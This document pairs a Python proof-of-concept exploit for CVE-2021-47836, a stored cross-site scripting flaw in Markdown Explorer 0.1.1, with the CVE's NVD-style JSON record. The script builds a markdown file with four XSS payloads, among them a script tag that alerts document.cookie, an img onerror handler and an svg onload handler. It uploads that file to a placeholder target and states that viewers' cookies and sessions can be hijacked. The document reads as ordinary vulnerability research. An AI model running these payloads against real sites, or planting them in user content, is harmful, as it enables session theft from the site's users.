CVE-2021-47836

# CVE-2021-47836 Markdown Explorer Stored XSS PoC # This PoC demonstrates how to exploit the stored XSS vulnerability # in Markdown Explorer 0.1.1 import requests import json TARGET_URL = "http://target.com/markdown-explorer" def create_malicious_markdown(): """ Create a malicious markdown file with XSS payload """ # Method 1: Using script tag payload1 = """<script>alert(document.cookie)</script>""" # Method 2: Using img onerror event payload2 = """<img src=x onerror=alert('XSS')>""" # Method 3: Using anchor with javascript protocol payload3 = """[Click me](javascript:alert('XSS'))""" # Method 4: Using event handlers payload4 = """<svg/onload=alert(document.domain)>""" # Combine payloads into markdown malicious_content = f"""# Malicious File {payload1} {payload2} {payload3} {payload4} This file contains XSS payloads. """ return malicious_content def upload_malicious_file(): """ Upload the malicious markdown file to the server """ files = { 'file': ('malicious.md', create_malicious_markdown(), 'text/markdown') } try: response = requests.post(f"{TARGET_URL}/upload", files=files) print(f"Upload Response: {response.status_code}") print(response.text) return response.json() except Exception as e: print(f"Error uploading file: {e}") return None def main(): print("=" * 50) print("CVE-2021-47836 Exploitation PoC") print("=" * 50) # Step 1: Create malicious markdown content print("\n[1] Creating malicious markdown file...") content = create_malicious_markdown() print(f"Payload created: {len(content)} bytes") # Step 2: Upload the file print("\n[2] Uploading malicious file...") result = upload_malicious_file() if result: print("\n[3] File uploaded successfully!") print("[!] When any user views this file, the XSS payload will execute") print("[!] This can lead to cookie theft, session hijacking, etc.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47836", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.050", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Markdown Explorer 0.1.1 contains a cross-site scripting vulnerability that allows attackers to inject malicious code through file uploads and editor inputs. Attackers can upload markdown files with embedded JavaScript payloads to execute remote commands and potentially gain system access."}, {"lang": "es", "value": "Markdown Explorer 0.1.1 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar código malicioso a través de cargas de archivos y entradas del editor. Los atacantes pueden cargar archivos markdown con cargas útiles de JavaScript incrustadas para ejecutar comandos remotos y potencialmente obtener acceso al sistema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/jersou/markdown-explorer", "source": "[email protected]"}, {"url": "https://imgur.com/a/w4bcPWs", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49826", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/markdown-explorer-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/markdown-explorer-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}